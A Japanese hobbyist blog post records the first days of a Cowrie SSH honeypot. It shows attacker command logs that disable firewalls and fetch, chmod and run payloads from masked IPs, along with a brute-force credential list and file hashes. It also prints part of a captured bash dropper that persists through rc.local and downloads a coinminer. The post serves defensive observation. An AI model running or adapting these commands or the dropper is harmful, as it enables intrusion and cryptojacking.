ハニーポットの観測記録

ハニーポッターすぎたむちのぶろぐ

ハニーポット観察日記【1】

前回のブログから時間が経過しましたが、
その間、やりたいことの一つであった「ハニーポットの構築」をしてみました。

VPSの選定からって書いてた気がしますが、さくらのVPSにしました。

OSはCentOS7でハニーポットはCowrie。

全然カスタマイズしてなくてほぼデフォの状態だから、
攻撃者にバレるかな~って思ったけど、
すでにアタックされ始めていてログも出ているので、
記録として残していこうと思います。

ちなみにCowrieにした理由は、
とりあえずハニーポットを構築して観察したかったのと、
ハニーポットって検索したらヒットしたので、なんとなくです。

あと、構築しやすそうだったからw

ってことで、構築後の観測データを書いていきます。
※構築手順はまた今度。

※ログは見やすいように一部加工してます。
IPアドレスとかはマスキングしてます。


実行されてたコマンド(20180801~20180805)

2018-08-01T18:44:19.552916+0900 CMD: uname -a
2018-08-01T21:10:16.235046+0900 CMD: uname -a
2018-08-01T21:10:17.699962+0900 CMD: w
2018-08-01T21:10:20.171706+0900 CMD:
2018-08-01T21:10:20.315283+0900 CMD:
2018-08-01T21:10:20.460726+0900 CMD:
2018-08-01T21:10:21.553762+0900 CMD: exit
2018-08-02T18:01:32.713708+0900 CMD: top
2018-08-03T04:01:37.607511+0900 CMD: ps | grep '[Mm]iner'
2018-08-03T04:01:38.913452+0900 CMD: ps -ef | grep
2018-08-03T04:01:40.268146+0900 CMD: uname -a
2018-08-04T09:50:24.264019+0900 CMD: /etc/init.d/iptables stop;
2018-08-04T09:50:28.254674+0900 CMD: service iptables stop;
2018-08-04T09:50:32.256648+0900 CMD: SuSEfirewall2 stop;
2018-08-04T09:50:36.255338+0900 CMD: reSuSEfirewall2 stop;
2018-08-04T09:50:40.253468+0900 CMD: cd /tmp;
2018-08-04T09:50:44.256222+0900 CMD: wget http://XX.XX.XX.XX:XX/servic;
2018-08-04T09:50:48.255654+0900 CMD: chmod 777 servic;
2018-08-04T09:50:52.254248+0900 CMD: ./servic;
2018-08-04T09:50:56.252458+0900 CMD: cd /
2018-08-04T09:51:00.261302+0900 CMD: wget -c -P /tmp/
2018-08-04T09:51:04.258159+0900 CMD: chmod 777 /tmp/server;
2018-08-04T09:51:08.255242+0900 CMD: /tmp/server;
2018-08-05T00:28:10.423309+0900 CMD: echo -n test
2018-08-05T00:28:11.678895+0900 CMD: cat /proc/version
2018-08-05T01:16:31.001492+0900 CMD: echo -n test
2018-08-05T01:16:32.300063+0900 CMD: cat /proc/version
2018-08-05T01:16:42.188558+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:16:43.548444+0900 CMD: cat >/tmp/.xs/daemon.i686.mod
2018-08-05T01:17:06.733979+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:17:08.086878+0900 CMD: cat >/tmp/.xs/daemon.mips.mod
2018-08-05T01:17:31.234012+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:17:32.518870+0900 CMD: cat >/tmp/.xs/daemon.mipsel.mod
2018-08-05T01:17:55.789687+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:17:57.089724+0900 CMD: cat >/tmp/.xs/test.mod
2018-08-05T01:29:09.748231+0900 CMD: echo -n test
2018-08-05T01:29:11.105573+0900 CMD: cat /proc/version
2018-08-05T01:29:20.905282+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:29:22.247696+0900 CMD: cat >/tmp/.xs/daemon.i686.mod
2018-08-05T01:29:45.428906+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:29:46.753762+0900 CMD: cat >/tmp/.xs/daemon.mips.mod
2018-08-05T01:30:10.002957+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:30:11.259457+0900 CMD: cat >/tmp/.xs/daemon.mipsel.mod
2018-08-05T01:30:34.500653+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:30:35.792037+0900 CMD: cat >/tmp/.xs/test.mod
2018-08-05T01:52:21.676712+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:52:23.042382+0900 CMD: cat >/tmp/.xs/daemon.i686.mod
2018-08-05T01:52:46.271990+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:52:47.603581+0900 CMD: cat >/tmp/.xs/daemon.mips.mod
2018-08-05T01:53:10.896366+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:53:12.147862+0900 CMD: cat >/tmp/.xs/daemon.mipsel.mod
2018-08-05T01:53:35.436219+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:53:36.701689+0900 CMD: cat >/tmp/.xs/test.mod
2018-08-05T01:54:49.297315+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:54:50.667651+0900 CMD: cat >/tmp/.xs/daemon.i686.mod
2018-08-05T01:55:13.843114+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:55:15.225255+0900 CMD: cat >/tmp/.xs/daemon.mips.mod
2018-08-05T01:55:38.439499+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:55:39.868812+0900 CMD: cat >/tmp/.xs/daemon.mipsel.mod
2018-08-05T01:56:03.046755+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:56:04.314239+0900 CMD: cat >/tmp/.xs/test.mod
2018-08-05T01:59:27.484369+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:59:28.743704+0900 CMD: cat >/tmp/.xs/daemon.i686.mod
2018-08-05T01:59:51.947812+0900 CMD: mkdir /tmp/.xs/
2018-08-05T01:59:53.360680+0900 CMD: cat >/tmp/.xs/daemon.mips.mod
2018-08-05T02:00:13.209439+0900 CMD: /ip cloud print
2018-08-05T02:00:16.591034+0900 CMD: mkdir /tmp/.xs/
2018-08-05T02:00:18.018468+0900 CMD: cat >/tmp/.xs/daemon.mipsel.mod
2018-08-05T02:00:24.870330+0900 CMD: ifconfig
2018-08-05T02:00:26.285454+0900 CMD: uname -a
2018-08-05T02:00:27.633864+0900 CMD: cat /proc/cpuinfo
2018-08-05T02:00:29.063836+0900 CMD: ps | grep '[Mm]iner'
2018-08-05T02:00:30.497360+0900 CMD: ps -ef | grep
2018-08-05T02:00:31.834388+0900 CMD: echo Hi | cat
2018-08-05T02:00:41.307761+0900 CMD: mkdir /tmp/.xs/
2018-08-05T02:00:42.562703+0900 CMD: cat >/tmp/.xs/test.mod


CMD: ps | grep '[Mm]iner'

これはコインマイナー系が動いてるかの確認でしょうか。

CMD: uname -a

よくあるやつ

CMD: w



CMD: /etc/init.d/iptables stop;

CMD: service iptables stop;

CMD: SuSEfirewall2 stop;

CMD: reSuSEfirewall2 stop;

Firewall停止したかったんでしょうね~。

CMD: wget http://XX.XX.XX.XX:XX/servic;

URLをVirosTotalで検索してみたら「検出率: 6 / 67」だった。

chmod 777 servic;

CMD: ./servic;

こっちは、ファイルがないってエラー吐いてました。
Cowrieだとダウンロードしたファイルが
dlフォルダに移動されちゃうからかな?


ログイン履歴(20180801~20180805)

試行回数 username / password
27 root / root
21 mother / fucker
11 admin / admin
5 pi / raspberryraspberry993311
5 pi / raspberry
2 root / rpitc
2 root / root123
2 /
1 username / password
1 user1 / 123
1 uno85 / uno85
1 ubnt / ubnt
1 support / iyeastar
1 root / welc0me
1 root / ubnt
1 root / password
1 root / nauawnlysr
1 root / nas4free
1 root / endian
1 root / eaton

※まだまだありますが、長くなりそうなのでこの辺で。

mother / fuckerが21回ってのはちょっと笑ったw

ログインできなくて、イライラしたのかな?w

でもでも、わりとすごい勢い・・・

2018-08-04T02:59:34.521370+0900 [mother/fucker] failed
2018-08-04T02:59:35.647353+0900 [mother/fucker] failed
2018-08-04T02:59:36.770312+0900 [mother/fucker] failed
2018-08-04T02:59:37.893843+0900 [mother/fucker] failed
2018-08-04T02:59:39.013244+0900 [mother/fucker] failed
2018-08-04T02:59:40.129496+0900 [mother/fucker] failed
2018-08-04T02:59:41.244944+0900 [mother/fucker] failed
2018-08-04T02:59:42.364081+0900 [mother/fucker] failed
2018-08-04T02:59:43.480003+0900 [mother/fucker] failed
2018-08-04T02:59:44.602556+0900 [mother/fucker] failed
2018-08-04T02:59:45.726605+0900 [mother/fucker] failed
2018-08-04T02:59:46.846003+0900 [mother/fucker] failed
2018-08-04T02:59:47.961363+0900 [mother/fucker] failed
2018-08-04T02:59:49.094965+0900 [mother/fucker] failed
2018-08-04T02:59:50.215676+0900 [mother/fucker] failed
2018-08-04T02:59:51.342780+0900 [mother/fucker] failed
2018-08-04T02:59:52.477609+0900 [mother/fucker] failed
2018-08-04T02:59:53.603185+0900 [mother/fucker] failed
2018-08-04T02:59:54.722632+0900 [mother/fucker] failed
2018-08-04T02:59:55.845908+0900 [mother/fucker] failed
2018-08-04T02:59:56.972947+0900 [mother/fucker] failed

ん~面白いから、まぁいいやw


ダウンロードされたファイル(20180801~20180805)

$ file *
04c587db92e7dc20ee5b6203357909f0075e11aa1088cca98d24652b5cc8351a: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=c0c8301fa94c01ee6d79e0d745b7830c77693a97, stripped
2f1f43d59dfc7d13b32165f2328dc1176b75021e3ee8d97ad0df33aa803432f5: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
5f511d1c54e4ee26ebe4f5793a8e064a418d10d52a43d886de32020ea4c9c664: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
db45013d633502575c1bd3eb1688056e89cb1f1bb938f04becc98eaa164165ab: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
e14264ea8afb49f6ca91f57226462e526ecf4f9d6af0784e92ea72c66a1839a1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
febb1f7dcd67d7f9823fe2c3e85fe1df4d6fc65316d7d1ba3565d1fb6bb7dc0b: Bourne-Again shell script, ASCII text executable

$ sha1sum *
4a675e06e7478d0f8f7345e72a86c29d52b1119e  04c587db92e7dc20ee5b6203357909f0075e11aa1088cca98d24652b5cc8351a
c5ce6b71689e2bd0412bff54e9d005384f0fd4e9  2f1f43d59dfc7d13b32165f2328dc1176b75021e3ee8d97ad0df33aa803432f5
8d4225360c68ab5344761a58cd677ed978599800  5f511d1c54e4ee26ebe4f5793a8e064a418d10d52a43d886de32020ea4c9c664
08828d360a1fcec29c03197e142a55e082172d5b  db45013d633502575c1bd3eb1688056e89cb1f1bb938f04becc98eaa164165ab
e0fb494fa4b1e869654da2008783cc6768daa36e  e14264ea8afb49f6ca91f57226462e526ecf4f9d6af0784e92ea72c66a1839a1
72500431d78500c7cec0c7a1f07180af8af4923b  febb1f7dcd67d7f9823fe2c3e85fe1df4d6fc65316d7d1ba3565d1fb6bb7dc0b

一つ一つ解析したいけど、時間と環境がないので、
とりあえずVirusTotalでハッシュを検索w

filename sha-1 VirusTotal 備考
04c587db92e7dc2... 4a675e06e7478d0... 検出率: 22 / 59 coinminer系
2f1f43d59dfc7d1... c5ce6b71689e2bd... 検出率: 15 / 57 Backdoor
5f511d1c54e4ee2... 8d4225360c68ab5... 検出率: 0 / 58
db45013d6335025... 08828d360a1fcec... 検出率: 9 / 59 Downloader系?
e14264ea8afb49f... e0fb494fa4b1e86... 検出率: 18 / 60 Backdoor
febb1f7dcd67d7f... 72500431d78500c... 検出率: 9 / 60 Downloader

※filenameとsha-1がテーブルに入らないので省略

ダウンロードされたファイルのうち febb1f7dcd67d7f9823fe2c3e85fe1df4d6fc65316d7d1ba3565d1fb6bb7dc0b: Bourne-Again shell script, ASCII text executable
が読めそうだったので、ちょっと覗いてみました。

#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
#                qun:10776622
#                2016-06-14

if [ "sh /etc/chongfu.sh &" = "$(cat /etc/rc.local | grep /etc/chongfu.sh | grep -v grep)" ]; then
    echo ""
else
    echo "sh /etc/chongfu.sh &" >> /etc/rc.local
fi

while [ 1 ]; do
    Centos_sshd_killn=$(ps aux | grep "/tmp/nux" | grep -v grep | wc -l)
    if [[ $Centos_sshd_killn -eq 0 ]]; then
        if [ ! -f "/tmp/nux" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://XX.XX.XX.XX:XX/nux
                ./wget -P /tmp/  http://XX.XX.XX.XX:XX/nux &> /dev/null
                chmod 755 /tmp/nux
                rm wget -rf
            else
                echo "No wget"
            fi
        fi


※以下 略
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.

らしいですw

時間もないのでコードはトレースしてないけど、
記述されていたIPアドレスwhoisなどで調べてみたら、
country: JPだったw
登録された住所も存在してないっぽい。
あとは、IPアドレスをさらに調査していくと、
出会い系サイトでも利用されてるみたい。

念のためVirusTotalでURLを検索してみたところ
検出率: 2 / 67 と少なめ。

実際にwgetしてみたところ、時間によってファイルが落ちてきたり、
そもそも繋がらなかったり。

wget http://XX.XX.XX.XX:XX/nux
--2018-08-05 10:46:51--  http://XX.XX.XX.XX:XX/nux
Connecting to XX.XX.XX.XX:XX... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1236080 (1.2M) [application/octet-stream]
Saving to: 'nux'

100%[===================================================================================================================================================================================================>] 1,236,080   1.70MB/s   in 0.7s

2018-08-05 10:46:51 (1.70 MB/s) - 'nux' saved [1236080/1236080]
$file nux
nux: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=c0c8301fa94c01ee6d79e0d745b7830c77693a97, stripped

$sha1sum nux
4a675e06e7478d0f8f7345e72a86c29d52b1119e  nux

上述したダウンロードされたファイル(20180801~20180805)にも
同じhash値のファイルがあったので、おそらくこのスクリプト
実行すると、コインマイナー系のマルウェアが落ちてくるっぽい。

まとめ

実際の攻撃を、身近で感じることができました。
まだ構築して間もないので、多少面白さに欠ける内容でしたが、
今後面白い攻撃などがあれば書いていこうと思います。
あとは、時間があるときにログやダウンロードファイルも解析していきたいなーと。

おーしまい。